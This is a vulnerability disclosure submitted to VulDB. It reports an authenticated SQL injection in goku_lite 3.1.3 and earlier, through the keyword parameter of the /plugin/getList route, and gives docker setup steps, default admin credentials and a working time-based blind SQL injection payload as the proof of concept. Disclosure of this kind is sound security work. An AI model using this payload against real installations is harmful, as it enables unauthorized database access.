| Field | Value |
|---|---|
| Title | goku_lite <= 3.1.3 Authenticated SQL injection via /plugin/getList route and keyword parameter |
| User | qsec (UID 33968) |
| Submitted | 11/11/2022 12:25 PM (3 years ago) |
| Moderated | 11/11/2022 01:14 PM (48 minutes later) |
| Status | Accepted |
| VulDB Entry | 213454 [eolinker goku_lite /plugin/getList route/keyword SQL injection] |
| Points | 17 |

# Description

# Get started
repo: **https://github.com/eolinker/goku_lite**
- Execute the docker command
- Start goku
```bash
docker run -dt -p 7000:7000 \
  -v /app/goku-ce/work:/app/goku-ce/console/work \
  -e GOKU_ADMIN_PASSWORD=123456 \
  --network=goku-ce \
  --ip x.x.x.x \
  --name goku-ce-console \
  eolinker/goku-api-gateway-ce-console
```
user/pass:
admin/123456
# Vulnerability
goku_lite <= 3.1.3 Authenticated SQL injection via /plugin/getList route and keyword parameter
Use admin/123456 to log in.
POC:
Request URL: http://testlink:7000/plugin/getList
Request Method: POST
PostData: keyword=' AND 8247=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- PSdW
Use sqlmap:

Please credit QSec-Team in the details of the CVE page.
Thanks,
QSec-Team